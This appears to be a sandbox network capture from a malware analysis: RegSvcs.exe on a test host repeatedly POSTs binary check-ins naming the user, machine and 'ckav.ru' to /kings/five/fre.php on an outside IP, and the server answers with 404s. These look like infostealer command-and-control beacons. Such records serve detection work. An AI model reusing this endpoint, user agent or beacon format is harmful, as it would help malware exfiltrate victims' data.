Dec 4, 2024 06:52:39.817699909 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:39 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49768	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:40.077786922 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:52:40.197879076 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:52:41.706990957 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:41 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49769	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:41.968180895 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:52:42.088176966 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:52:43.607929945 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:43 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49770	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:43.954031944 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:52:44.074153900 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:52:45.535087109 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:45 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49771	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:45.805480957 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:52:45.927567005 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:52:47.435343027 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:47 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49772	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:47.708317995 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:52:47.828392982 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:52:49.348959923 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:49 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49773	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:49.659935951 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:52:49.779958963 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:52:51.250996113 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:51 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49774	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:51.515549898 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:52:51.635755062 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:52:52.949302912 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:52 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49775	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:53.224378109 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:52:53.344477892 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:52:54.623199940 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:54 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49776	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:54.889772892 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:52:55.009702921 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:52:56.524264097 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:56 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49778	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:56.780823946 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:52:56.900865078 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:52:58.371764898 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:58 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49780	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:52:58.641870022 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:52:58.761872053 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:00.231060028 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:52:59 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49786	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:00.499943018 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:00.620038986 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:02.093612909 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:01 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49792	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:02.357311964 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:02.477302074 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:04.008790970 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:03 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49793	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:04.281270027 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:04.401220083 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:05.702600956 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:05 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49799	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:05.975161076 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:06.095983982 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:07.476594925 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:07 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49805	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:07.731486082 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:07.851505995 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:09.330075979 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:09 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49811	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:09.593000889 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:09.713035107 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:11.164197922 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:10 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49816	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:11.517294884 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:11.637326956 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:12.980808020 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:12 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49818	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:13.250663042 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:13.370848894 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:14.867993116 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:14 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49824	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:15.124722958 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:15.244854927 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
Dec 4, 2024 06:53:16.678155899 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 04 Dec 2024 05:53:16 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49829	94.156.177.41	80	7996	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 06:53:16.937107086 CET	244	OUT	POST /kings/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2F83DE58 Content-Length: 149 Connection: close
Dec 4, 2024 06:53:17.057306051 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
